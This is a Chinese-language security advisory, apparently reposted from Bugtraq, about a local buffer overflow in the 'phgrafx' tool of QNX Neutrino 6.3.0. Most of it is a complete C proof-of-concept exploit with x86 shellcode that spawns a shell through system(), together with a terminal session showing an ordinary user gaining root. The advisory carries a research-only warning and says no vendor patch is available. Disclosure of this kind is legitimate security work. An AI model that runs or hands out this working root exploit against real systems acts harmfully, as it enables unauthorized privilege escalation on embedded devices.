发布日期：2005-11-29
更新日期：2005-11-29

受影响系统：

QNX Neutrino 6.3.0

描述：

---

BUGTRAQ  ID: 15619

QNX Neutrino是嵌入式设备的微内核实时操作系统。

QNX Neutrino的"phgrafx"工具中存在缓冲区溢出漏洞，恶意用户可以利用这个漏洞在本地获得权限提升。

例如：

qnx$ uname -a; id
QNX qnx 6.3.0 2004/04/29-21:23:19UTC x86pc x86
uid=6(deadbeef) gid=1(bin) groups=0(root),3(sys),4(adm),5(tty)
qnx$ gcc phex.c -o phex -W
qnx$ ./phex
shellcode length: 21
address: 0x8047a2c
Warning: can not find palette under '55°|ØHæ1°'.
# id
uid=6(deadbeef) gid=1(bin) euid=0(root) groups=0(root),3(sys),4(adm),5(tty)
#

<*来源：pasquale minervini （minervini@neuralnoise.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=113332929220972&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/*
* minervini@neuralnoise.com (c) 2005, all rights reserved.
* sample exploit for phgrafx on QNX 6.3.0 x86
*
* tested on: QNX qnx 6.3.0 2004/04/29-21:23:19UTC x86pc x86
*/

#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
#include <unistd.h>
#include <err.h>

#ifndef _PATH
# define _PATH ("/usr/photon/bin/phgrafx")
#endif

#ifndef _RET_INIT
# define _RET_INIT (864)
#endif

/* thanks to my friend pi3 that suggested me to call a libc
* function to make the shellcode way shorter than it was */

char scode[] = "\x31\xc0"    // xor    %eax,%eax
  "\x50"            // push   %eax
  "\x68\x2f\x2f\x73\x68"    // push   $0x68732f2f
  "\x68\x2f\x62\x69\x6e"    // push   $0x6e69622f
  "\x54"            // push   %esp
  "\xbb\xEF\xBE\xAD\xDE"    // mov    $0xDEADBEEF,%ebx
  "\xff\xd3";            // call   *%ebx

unsigned long get_sp (void) {
   __asm__ ("movl %esp, %eax");
}

int main (int argc, char **argv) {
  
   int i, slen = strlen (scode), offset = 0;
   long ptr, *lptr, addr;
   char *buf;
   void *handle;
  
   handle = dlopen (NULL, RTLD_LAZY);
   addr = (long) dlsym (handle, "system");
  
   for (i = 0; i < 4; i++) {
      char temp = (*((char *) &addr + i) & 0xff);
      if (temp == 0x00 || temp == 0x09 || temp == 0x0a) {
     puts
       ("currently system()'s address contains bytes like 0x00, 0x09 or 0x0a, so it \
                probably won't work since"
        " the application seems to truncate those bytes. BTW you can rely on functions \
like exec*(), spawn*()"  " or MsgSend*() to get this working.\n"
        "more at http://www.qnx.org/developers/docs/momentics621_docs/neutrino/lib_ref/") \
;  return (-1);
      }
   }
  
   memcpy((char *)&scode + 0xf, &addr, 4);
  
   if (argc > 1)
     offset = strtoul(argv[1], NULL, 0);
  
   if (!(buf = (char *) malloc(1032)))
     err(1, "malloc()");
  
   memset(buf, 0, 1032);
  
   for (i = 0; i < (_RET_INIT - slen); i++)
     buf[i] = 'A'; // inc %ecx
  
   printf("shellcode length: %d\n", slen);
  
   for (i = (_RET_INIT - slen); i < _RET_INIT; i++)
     buf[i] = scode[i - (_RET_INIT - slen)];
  
   lptr = (long *) (buf + _RET_INIT);
  
   printf("address: 0x%lx\n", ptr = (get_sp () - offset));
  
   for (i = 0; i < ((1024 - _RET_INIT) / 4); i++)
     *(lptr + i) = (int) ptr;
  
   execl(_PATH, "phgrafx", buf, NULL);
  
   return (0);
}

建议：

---

厂商补丁：

QNX
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.qnx.com/

浏览次数：2657
严重程度：0（网友投票）